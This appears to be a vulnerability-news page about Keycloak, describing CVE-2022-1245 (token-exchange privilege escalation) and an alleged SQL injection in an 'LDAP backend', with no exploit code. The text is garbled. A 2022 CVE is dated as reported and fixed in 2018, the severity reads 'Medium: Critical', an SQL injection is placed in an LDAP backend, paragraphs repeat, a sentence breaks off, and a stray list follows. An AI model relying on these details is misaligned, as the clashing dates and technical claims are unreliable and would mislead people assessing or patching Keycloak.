CVE-2022-1245 A privilege escalation flaw was found in keycloak's token exchange feature. Missing authorization allows a client application to exchange tokens for any target client.

CVE-2022-1245 A privilege escalation flaw was found in keycloak's token exchange feature. Missing authorization allows a client application to exchange tokens for any target client.

This issue was reported to keycloak on 2018-02-22, and was fixed in release 3.0.0 on 2018-02-28.

2018-02-25: Medium: Critical: Remote code execution via SQL Injection in the LDAP backend - updated Severity: Medium - updated Credit: Khalil Shoukry Vulnerability details: A SQL injection flaw was found in the LDAP backend of keycloak. A malicious user with database rights can inject arbitrary SQL statements into the keycloak database and cause denial of service (DoS) or remote code execution. This occurred due to insufficient validation of user input passed to the database. This issue was reported to keycloak on 2018-02-25, and was fixed in release 3.0.0 on 2018-03-01. A SQL injection flaw was found in the LDAP backend of keycloak. A malicious user with database rights can inject arbitrary SQL statements into the keycloak database and cause denial of service (DoS) or remote code execution. This occurred due to insufficient validation of user input passed to the database. This issue was reported to keycloak on 2018-02-25, and was fixed in release 3.0.0 on 2018-03-01. How likely are these issues for somebody doing a web application penetration test? Keycloak is currently used by companies in many different industries, including finance, retail, and education. As such, the majority of

SQL Injection in the LDAP backend a. SQL injection vulnerability in the LDAP backend of keycloak

b. Remote code execution vulnerability in the LDAP backend of keycloak
c. Remote code execution vulnerability that allows an anonymous attacker to inject SQL queries into keycloak

References

Subscribe to CVE.news
Don’t miss out on the latest issues. Sign up now to get access to the library of members-only issues.
jamie@example.com
Subscribe